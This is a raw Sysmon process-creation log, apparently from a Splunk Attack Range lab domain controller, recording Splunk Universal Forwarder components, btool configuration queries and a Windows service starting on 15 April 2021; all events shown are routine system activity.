154100x80000000000000005449Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:26:24.348{A8622C2F-3F00-6078-F300-00000000AE01}3940C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000005433Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:26:23.769{A8622C2F-3EFF-6078-F200-00000000AE01}2712C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000005419Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:26:22.644{A8622C2F-3EFE-6078-F100-00000000AE01}2872C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000005405Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:26:21.941{A8622C2F-3EFD-6078-F000-00000000AE01}2996C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000005389Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:26:21.144{A8622C2F-3EFD-6078-EF00-00000000AE01}2820C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 
154100x80000000000000005206Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:25:26.398{A8622C2F-3EC6-6078-EB00-00000000AE01}2712C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000005191Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:25:25.100{A8622C2F-3EC5-6078-EA00-00000000AE01}4484C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000005177Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:25:24.428{A8622C2F-3EC4-6078-E900-00000000AE01}2024C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000005161Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:25:23.740{A8622C2F-3EC3-6078-E800-00000000AE01}2744C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000005147Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:25:22.614{A8622C2F-3EC2-6078-E700-00000000AE01}3684C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000005132Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
13:25:21.942{A8622C2F-3EC1-6078-E600-00000000AE01}4552C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000005117Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:25:21.098{A8622C2F-3EC1-6078-E500-00000000AE01}4488C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000005003Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:24:26.334{A8622C2F-3E8A-6078-E300-00000000AE01}3676C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000004982Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:24:25.700{A8622C2F-3E89-6078-E200-00000000AE01}4508C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe8.0.2Monitor windows event logssplunk ApplicationSplunk Inc.splunk-winevtlog.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=A735F697C6C533F20D023E4318824194,SHA256=295236CFB06A5F9C1F76EECC468F9A070BFCB5C4E094918059EC86BBB654E119,IMPHASH=85F4904CF3562658E303E53274ABD436{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000004967Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:24:25.027{A8622C2F-3E89-6078-E100-00000000AE01}2684C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 
154100x80000000000000004953Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:24:24.355{A8622C2F-3E88-6078-E000-00000000AE01}4504C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000004936Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:24:23.683{A8622C2F-3E87-6078-DF00-00000000AE01}2592C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000004923Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:24:23.056{A8622C2F-3E87-6078-DE00-00000000AE01}2220C:\Program Files\SplunkUniversalForwarder\bin\splunk-perfmon.exe8.0.2Performance monitorsplunk ApplicationSplunk Inc.splunk-perfmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-perfmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=1F3027C93882E5D5A667B84CCEF3ED67,SHA256=504CDB3742BCBF617C837270CCEC0243205B7BF0A6AB5117EFB838DD2F004AAC,IMPHASH=53D37CD53647C5D82FCFA9E6970E154E{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000004909Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:24:22.540{A8622C2F-3E86-6078-DD00-00000000AE01}636C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000004891Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:24:21.867{A8622C2F-3E85-6078-DC00-00000000AE01}4264C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 
154100x80000000000000004867Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:24:21.194{A8622C2F-3E85-6078-DB00-00000000AE01}1336C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000004850Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:24:20.522{A8622C2F-3E84-6078-DA00-00000000AE01}1772C:\Program Files\SplunkUniversalForwarder\bin\splunk-wmi.exe8.0.2Remote Performance monitor using WMIsplunk ApplicationSplunk Inc.splunk-wmi.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-wmi.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=5DA29397A44401083341D66B52CA8BC4,SHA256=F51A58BCBF3532B9EF1B6478839424C33EA0426BCD5C6B4B636AD25D5177379C,IMPHASH=FFEB0CD073A55A73D08AC443E4942F81{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000004835Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:24:19.849{A8622C2F-3E83-6078-D900-00000000AE01}4228C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe-----"C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe"C:\Windows\system32\NT 
httpServer --no-log 154100x80000000000000004116Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:24:10.119{A8622C2F-3E7A-6078-A200-00000000AE01}4100C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list httpServer --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-3E77-6078-9400-00000000AE01}3192C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE" restart --waitonpid=2064 154100x80000000000000004061Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:24:08.464{A8622C2F-3E78-6078-9F00-00000000AE01}5076C:\Windows\System32\msdtc.exe2001.12.10941.16384 (rs1_release.160715-1616)Microsoft Distributed Transaction Coordinator ServiceMicrosoft® Windows® Operating SystemMicrosoft CorporationMSDTC.EXEC:\Windows\System32\msdtc.exeC:\Windows\system32\NT AUTHORITY\NETWORK SERVICE{A8622C2F-3DEE-6078-E403-000000000000}0x3e40SystemMD5=308F08347923DEEDE7BC03EC7D485841,SHA256=72DB45CA11FE635DF9F8273C38CBEFB8DF5362ADA0CBF6D2B1E570365DC700C0,IMPHASH=D02F3DF332409C5D3F34BA2D38FC4ED4{A8622C2F-3DEC-6078-0A00-00000000AE01}832C:\Windows\System32\services.exeC:\Windows\system32\services.exe 154100x80000000000000004026Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:24:07.792{A8622C2F-3E77-6078-9D00-00000000AE01}4884C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list kvstore --no-logC:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{A8622C2F-3E77-6078-9C00-00000000AE01}4760C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list kvstore --no-log 154100x80000000000000004013Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:24:07.786{A8622C2F-3E77-6078-9C00-00000000AE01}4760C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list kvstore --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{A8622C2F-3E77-6078-9B00-00000000AE01}4776C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list kvstore --no-log 154100x80000000000000004000Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:24:07.780{A8622C2F-3E77-6078-9B00-00000000AE01}4776C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list kvstore --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-3E77-6078-9400-00000000AE01}3192C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE" restart --waitonpid=2064 154100x80000000000000003985Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:24:07.499{A8622C2F-3E77-6078-9A00-00000000AE01}4696C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{A8622C2F-3E77-6078-9900-00000000AE01}4672C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list general --no-log 154100x80000000000000003972Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:24:07.493{A8622C2F-3E77-6078-9900-00000000AE01}4672C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{A8622C2F-3E77-6078-9800-00000000AE01}4664C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list general --no-log 154100x80000000000000003959Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:24:07.487{A8622C2F-3E77-6078-9800-00000000AE01}4664C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-3E77-6078-9400-00000000AE01}3192C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program 
Files\SplunkUniversalForwarder\bin\Splunk.EXE" restart --waitonpid=2064 154100x80000000000000003944Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:24:07.196{A8622C2F-3E77-6078-9700-00000000AE01}3536C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool web list settings --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{A8622C2F-3E77-6078-9600-00000000AE01}3908C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool web list settings --no-log 154100x80000000000000003931Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:24:07.189{A8622C2F-3E77-6078-9600-00000000AE01}3908C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool web list settings --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{A8622C2F-3E77-6078-9500-00000000AE01}3376C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool web list settings --no-log 154100x80000000000000003918Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:24:07.183{A8622C2F-3E77-6078-9500-00000000AE01}3376C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool web list settings --no-logC:\Windows\system32\NT 
